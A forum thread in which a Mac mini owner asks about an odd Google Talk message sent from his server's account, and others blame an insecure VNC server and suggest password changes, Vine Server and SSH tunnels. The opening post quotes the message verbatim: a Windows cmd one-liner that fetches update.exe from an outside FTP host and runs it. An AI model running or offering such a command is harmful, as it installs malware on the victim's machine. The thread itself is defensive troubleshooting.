[abbaZaba]

so I have a mini that is on at all times basically acting as a server for various things that I do. I have adium running all the time signed in to a Google Talk account I just use for email to sign up for websites and whatnot. on my phone I have a google talk client that is signed into another google account (my main one, which is my full name). I use this to send messages to the mini, somewhat like taking notes or using it to remind me of something later, when I get home.

I was at work today and I received a message sent from the mini's account. here is the message:

cmd /c echo open upgrade2.myftp.org 21 >> ik &echo user temp temp >> ik &echo binary >> ik &echo get update.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &update.exe &exit

echo You got owned

to me, it looks like someone was trying to execute commands through google talk to connect to an ftp server and download a file (update.exe) then send me a message telling me I got owned (what a loser).

can anyone shed some light on this? are my gmail accounts compromised in some way? the message was sent from the mini's account to my personal account with my full name which is a little disconcerting. I do not think anything was downloaded, at least I hope not.

[gilp1n]

Definitely looks like something sketchy is going on - if you haven't already, I would change both passwords to be safe. Also, reporting the activity to Google might be a good idea as well.

Best of luck!

[shifuimam]

http://ubuntuforums.org/showthread.php?t=980832

VNC (which is what Apple Remote Desktop is) may be the culprit here. Try disabling it and see what happens. You also might try using a different VNC server to remote into that machine, and make sure you've set a password.

[abbaZaba]

why would this show up through Adium via Google Talk if VNC is the culprit?

[Rumor]

It looks more like an exploit though Bonjour (that is what Gtalk uses, no?) and aimed for Windows machines. Changing your password would not hurt, but probably will not make a difference either. I get random spam through Adium via MSN, which I chalk up to random spam.

[abbaZaba]

google talk uses jabber.

but the message originated from the client that the mini logs in to, as in the mini sent this message to me somehow, which is confusing because I am unsure how that would be possible

[Rumor]

Jabber is what I meant, just been drinking a bit.

Chances are that your email got around (it does happen even if you are careful, mine has and it is unique, only two people in the US with my first and last name). Just block it from contacting you. There are more tech folk here that can help you block it that I can. Though, I bet it is a simple fix.

[Rumor]

Check the access logs on the mini.

[shifuimam]

Originally Posted by abbaZaba 

why would this show up through Adium via Google Talk if VNC is the culprit?

Your guess is as good as mine. I just Googled "echo You got owned", and all I'm seeing is stuff about an insecure VNC server being the root cause of this particular issue. Since it's trying to run a Windows command, it's some kind of bot doing the dirty work - probably using the jabber protocol to send messages to the victim.

If it happens again, and you have Apple remote desktop enabled, you might as well try disabling it and see if this keeps happening. Just a thought.

[abbaZaba]

well I disabled the VNC and closed that port.

is there a third party VNC server for OSX? I dislike not being able to have access to VNC options like I do in TightVNC for windows. likewise for the SFTP server built into OSX. I'd really love to be able to change that port.

[shifuimam]

Vine VNC is what I use. It's much better than Apple remote desktop anyhow, since you can connect to it with far more options than what Apple provides. You can also make it use whatever port you want, and it's got a service module that runs so that you can VNC into your Mac even if a user account isn't logged in.

Vine Server (OSXvnc) | Get Vine Server (OSXvnc) at SourceForge.net

Set your router to block all ports except the SSH port and make SSH tunnels whenever you want to access the server from outside your network.

[abbaZaba]

Vine VNC is pretty dang awesome. I dunno how I never stumbled upon it before.

as for SSH tunneling everything: I can't really do that since I use the mini (server) as a seedbox for BT, a Quinn server, pulpTunes (to access music library), etc so I think it would be a hassle to make SSH tunnels for all these things, even if it was possible.

I definitely think it would be a good idea to create an SSH tunnel for VNCing into the mini though. I just have to figure out exactly how to do this.

Well, for services that are for the public, it can't be done, but for any service that is just for you, you can make a quick script to make all of the tunnels, and then anytime you want to use them, just click on your script.

[shifuimam]

FWIW, I don't go that far with security on my machines, and my network is plenty secure. This is also including the fact that boyfriend serves online games from our network, so people know our IP and the various no-ip domains pointing to it. We haven't had any security breaches yet, in Windows or OS X.